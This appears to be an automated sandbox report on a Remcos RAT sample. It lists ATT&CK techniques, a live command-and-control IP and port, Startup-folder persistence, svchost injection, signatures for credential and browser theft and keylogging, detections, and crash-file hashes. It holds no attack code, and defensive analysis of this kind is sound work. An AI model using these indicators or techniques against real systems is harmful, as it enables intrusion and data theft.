                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00096596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00096596
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00096A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00096A5A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		2
                  Valid Accounts                  		2
                  Native API                  		111
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		11
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		221
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		2
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution                  		2
                  Valid Accounts                  		1
                  Bypass User Account Control                  		21
                  Obfuscated Files or Information                  		2
                  Credentials In Files                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares221
                  Input Capture                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Windows Service                  		2
                  Valid Accounts                  		11
                  Software Packing                  		NTDS4
                  File and Directory Discovery                  		Distributed Component Object Model3
                  Clipboard Data                  		1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                  Registry Run Keys / Startup Folder                  		21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		LSA Secrets126
                  System Information Discovery                  		SSHKeylogging1
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Windows Service                  		1
                  Bypass User Account Control                  		Cached Domain Credentials251
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items322
                  Process Injection                  		1
                  Masquerading                  		DCSync1
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
                  Registry Run Keys / Startup Folder                  		2
                  Valid Accounts                  		Proc Filesystem2
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                  Access Token Manipulation                  		Network Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd322
                  Process Injection                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1505824 Sample: jv4ri.exe Startdate: 06/09/2024 Architecture: WINDOWS Score: 100 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 10 other signatures 2->63 9 jv4ri.exe 6 2->9         started        13 wscript.exe 1 2->13         started        process3 file4 37 C:\Users\user\AppData\Local\...\name.exe, PE32 9->37 dropped 81 Binary is likely a compiled AutoIt script file 9->81 15 name.exe 3 9->15         started        83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->83 19 name.exe 2 13->19         started        signatures5 process6 file7 41 C:\Users\user\AppData\Roaming\...\name.vbs, data 15->41 dropped 45 Multi AV Scanner detection for dropped file 15->45 47 Binary is likely a compiled AutoIt script file 15->47 49 Machine Learning detection for dropped file 15->49 55 2 other signatures 15->55 21 name.exe 2 15->21         started        24 svchost.exe 15->24         started        51 Writes to foreign memory regions 19->51 53 Maps a DLL or memory area into another process 19->53 26 svchost.exe 19->26         started        signatures8 process9 signatures10 65 Binary is likely a compiled AutoIt script file 21->65 67 Writes to foreign memory regions 21->67 69 Maps a DLL or memory area into another process 21->69 28 svchost.exe 3 2 21->28         started        71 Contains functionality to bypass UAC (CMSTPLUA) 24->71 73 Contains functionalty to change the wallpaper 24->73 75 Contains functionality to steal Chrome passwords or cookies 24->75 79 3 other signatures 24->79 77 Detected Remcos RAT 26->77 process11 dnsIp12 43 45.95.169.104, 2404, 49704, 49721 GIGANET-HUGigaNetInternetServiceProviderCoHU Croatia (LOCAL Name: Hrvatska) 28->43 39 C:\ProgramData\remcos\logs.dat, data 28->39 dropped 85 System process connects to network (likely due to code injection or exploit) 28->85 87 Detected Remcos RAT 28->87 89 Tries to harvest and steal browser information (history, passwords, etc) 28->89 91 Installs a global keyboard hook 28->91 33 WerFault.exe 4 16 28->33         started        35 WerFault.exe 20 16 28->35         started        file13 signatures14 process15

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  jv4ri.exe42%ReversingLabsWin32.Trojan.Vindor
                  jv4ri.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\directory\name.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\directory\name.exe42%ReversingLabsWin32.Trojan.Vindor

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://upx.sf.net0%URL Reputationsafe
                  5.95.169.1040%Avira URL Cloudsafe
                  http://geoplugin.net/json.gp0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gp/C0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  5.95.169.104true
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpsvchost.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://upx.sf.netAmcache.hve.8.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://geoplugin.net/json.gp/Cname.exe, 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  45.95.169.104
                  		unknownCroatia (LOCAL Name: Hrvatska)
                  		42864GIGANET-HUGigaNetInternetServiceProviderCoHUtrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1505824
                  Start date and time:2024-09-06 21:56:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:jv4ri.exe
                  Detection:MAL
                  Classification:mal100.rans.troj.spyw.expl.evad.winEXE@16/22@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 63
                  • Number of non-executed functions: 272
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.168.117.173
                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: jv4ri.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  15:57:21API Interceptor2x Sleep call for process: WerFault.exe modified
                  21:56:58AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  GIGANET-HUGigaNetInternetServiceProviderCoHUP.O_Qouts_t87E90Y-E4R7G-PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 45.95.169.18
                  7GfciIf7ys.exeGet hashmaliciousUnknownBrowse
                  • 45.95.169.223
                  Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 45.95.169.110
                  Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 45.95.169.110
                  RFQ-7H87-F8R-pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 45.95.169.139
                  Q-5687-348t.exeGet hashmaliciousRemcosBrowse
                  • 45.95.169.135
                  BdrPfb3rZS.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 45.95.169.149
                  otpD06ykDv.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 45.95.169.149
                  wzPLWj0B5C.elfGet hashmaliciousGafgytBrowse
                  • 45.95.169.146
                  NxFjydLnaS.elfGet hashmaliciousGafgytBrowse
                  • 45.95.169.146

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_90306d8653668e93dc76e25903a477e7da5e9b1_1b8f0228_3462b859-46f3-46d3-976d-c605528b01ec\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9084555098033209
                  Encrypted:false
                  SSDEEP:192:hCT1Js8A0YrZkhaJjkZriHzzuiFeZ24IO8KRA:ABJs8bYrZkhaJjNzuiFeY4IO8KRA
                  MD5:9A9499B08C58249EC40A0C574AD65014
                  SHA1:4D1E3B3B51DC3EE698768A8885BE7896F11A5FF8
                  SHA-256:8D46733E9BA16B3E7456404896C2B192B7D8CC4945DA71AD1F4DAC0CD82D7AD1
                  SHA-512:AB0F1BA3AAD43F92E03FA4E0CEEDF076A4431A7A07D1F584834F1076A798417D179F582C96241AD7CF94D3B749C942A062930D4318930C102AE06BDD68EE0D39
                  Malicious:false
                  Reputation:low
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.1.2.6.2.1.9.0.7.6.0.3.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.1.2.6.2.1.9.5.4.4.7.8.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.6.2.b.8.5.9.-.4.6.f.3.-.4.6.d.3.-.9.7.6.d.-.c.6.0.5.5.2.8.b.0.1.e.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.7.5.7.c.4.4.-.b.6.4.f.-.4.7.2.4.-.b.1.6.6.-.a.7.b.b.1.8.6.7.6.d.3.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.8.0.-.0.0.0.1.-.0.0.1.4.-.e.9.4.3.-.b.4.e.d.9.6.0.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.3.1.9.6.f.4.5.b.2.6.9.a.6.1.4.a.3.9.2.6.e.f.c.0.3.2.f.c.9.d.7.5.0.1.7.f.2.7.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_fbbd68dbb613b46818cd907af168fb3f524e519_1b8f0228_ba63b463-c4dd-42e3-a65c-d22e9f103333\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9363468098655506
                  Encrypted:false
                  SSDEEP:192:qWT1JFL8M0qG2GFjjkZriH4zuiFeZ24IO8KRA:rBJFL8HqGPFjjGzuiFeY4IO8KRA
                  MD5:CE1BE38E08A03142200168DA967A37C7
                  SHA1:BB72B5B02DB7C6534EAF7AC7E3C65233AB7A4FDD
                  SHA-256:952DD915722585B06AC30B64EF8200CF7F2F714AA897C9D6BA2B3D8EC968BB57
                  SHA-512:40ABD219564502A4C987E682201584EB79FA8F7AB6E916BFAD13708C10BE709455758D62C1BAF1438DA323FD0374155A72A3AFB1FBD5B48011CC80EC2923253C
                  Malicious:false
                  Reputation:low
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.1.2.6.2.4.1.8.9.6.1.3.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.1.2.6.2.4.2.3.9.6.1.3.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.6.3.b.4.6.3.-.c.4.d.d.-.4.2.e.3.-.a.6.5.c.-.d.2.2.e.9.f.1.0.3.3.3.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.1.8.6.9.5.b.f.-.4.3.b.c.-.4.3.d.b.-.9.c.d.f.-.2.6.9.c.6.8.b.1.8.a.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.8.0.-.0.0.0.1.-.0.0.1.4.-.e.9.4.3.-.b.4.e.d.9.6.0.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.3.1.9.6.f.4.5.b.2.6.9.a.6.1.4.a.3.9.2.6.e.f.c.0.3.2.f.c.9.d.7.5.0.1.7.f.2.7.e.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER654F.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Fri Sep 6 19:56:59 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):85234
                  Entropy (8bit):1.7825057835408542
                  Encrypted:false
                  SSDEEP:384:Jy98g9USjG5jnkiJ6E6N9kQ7ZHbpShKkyvI2N:Jy9NuGG5jnL6ECkQlpS6wy
                  MD5:6CAA514D6F59A04A51FE30F262AD223A
                  SHA1:1F254BA3B1F4F347D885068C5BBAB7E27A7104F2
                  SHA-256:B7DDF4287F453B6DC3BFCBBC3A596A3A70B78A948484F367F0FA28284625AD8D
                  SHA-512:CA62C4B03D4BCE882458CD7A81CCFC8E19BAD99A9B353202C91AE5168197A2F1B98CFD8F403E613FC9D1BF87AC68AE6E3FF22DC295458B51563EBAA3CD94A9F6
                  Malicious:false
                  Reputation:low
                  Preview:MDMP..a..... ........^.f.........................................;..........T.......8...........T...........p..../.......... ...........................................................................................eJ..............GenuineIntel............T............^.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER662B.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8272
                  Entropy (8bit):3.691727776888771
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJwxl6d6Yl36AIyXgmfp7JuZ+2prt89bOgsfwam:R6lXJU6d6YV6AIyXgmfp7JuZ+pOzfM
                  MD5:ED0F4771C5B986786FAB93EE755DE9E0
                  SHA1:989ED459F093DD94DF83794A1968AE586E702E9F
                  SHA-256:D209FFA07072B57BBEABAAF5AD8ED948A63BC55D12C424E26C74BE63300C129E
                  SHA-512:ADC9DA2B7D57A3F5BF882DC7821DA7D0DA522E4A9858AB68285BCCDFECE298CC3591B1FCEFD70CDBF6848EAE630AEAB892A2E268B6F48472E3F2E9BCA20169EE
                  Malicious:false
                  Reputation:low
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.1.2.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER666A.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4655
                  Entropy (8bit):4.45001390218119
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zswJg77aI9a1WpW8VYTvYm8M4JCxIFoZ+q8ST8D0md:uIjf2I70E7VLJC5Z/8D0md
                  MD5:133C0C7B79A92EB692A12FA6061B4129
                  SHA1:80B4D0EAFCB4A62E58AD40BC1E89FA09E8F9C52F
                  SHA-256:510A075326DA93001F7892BDE68EA14FBCD361F2F5E0C7417515E2E2C5844EC4
                  SHA-512:7538923EA3E09A7FCEA7920A9B0F977333BAFDA79EF964E45737317FAE3E0FBBFC4701114C17F143A37AE4186775193F1C0F84FD2EBE301375F5A31F505E11B1
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="488819" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE7B.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Fri Sep 6 19:57:22 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):140908
                  Entropy (8bit):1.7781722702700224
                  Encrypted:false
                  SSDEEP:768:eRrUBgG5trDWl06ECkQoNpho189O+lF4rho75HxqA/+2K:krapr5v9o189O+X4rho75HxqA/+2K
                  MD5:A9214519048212A3B607FF09DCEFCF44
                  SHA1:92C8D25C8E0BBBDC84C013BC3F13EAE2094F405D
                  SHA-256:C56ECC7072B919E252F9793C015C902C732638C8933189AAB055315934128913
                  SHA-512:9B90E64EFB5F4E7DD871A7C53FCEA8F892A33D6BC6B7490365D01F3391EDE60A010BE46DB95D4FBAE8AE537FBDBAD64407AA43E1638FD3EFA981C2D26A0FDDB0
                  Malicious:false
                  Preview:MDMP..a..... ........^.f........................D................R..........T.......8...........T............&..d........... ............ ..............................................................................eJ....... ......GenuineIntel............T............^.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFE3.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8280
                  Entropy (8bit):3.686134361783112
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJwCA6Hizo46Yl+6AIyXgmfp79AWpDa89brgsf3Zm:R6lXJC6Y6YM6AIyXgmfp79Hrzfk
                  MD5:C200811CB02528FA2B3324A79DD63E1C
                  SHA1:A624E6D0D65D6059DF60E10307AFCDE169BEEE99
                  SHA-256:EE5A86E12BF0A146BF17F7E950CF2F4709A0C19355E898A313157B783415BCCD
                  SHA-512:197616F701A07DF2742784F5AF38E1BE289FC6F13FEAB529A6C1911AE9345EC39FF335AECD86F86F59963494DA49C12B988E9D28729E6A326E5D50B426070068
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.1.2.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC004.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4655
                  Entropy (8bit):4.448573265436057
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsgJg77aI9a1WpW8VYEYm8M4JCxKFz+q8oT8D0md:uIjfmI70E7V4JCqR8D0md
                  MD5:C6176340C1DE8B66707006EFCF8F4595
                  SHA1:3858600F6F26252CF08F05E819BE08E5BC1C3F57
                  SHA-256:E062CE157B4DD320BF56F9F8B1DADB9D8AA09C6C14F1F45E2D57BE8732338C6A
                  SHA-512:9632ACF54EFDDBE9152321470670E001A85CC7711F6BDA7C8354AF95F02BD0044B40FD3E24B0933DA2F51047E2BB3DF11D3C58D9175EA43D05B4A5AC948DDAFF
                  Malicious:false
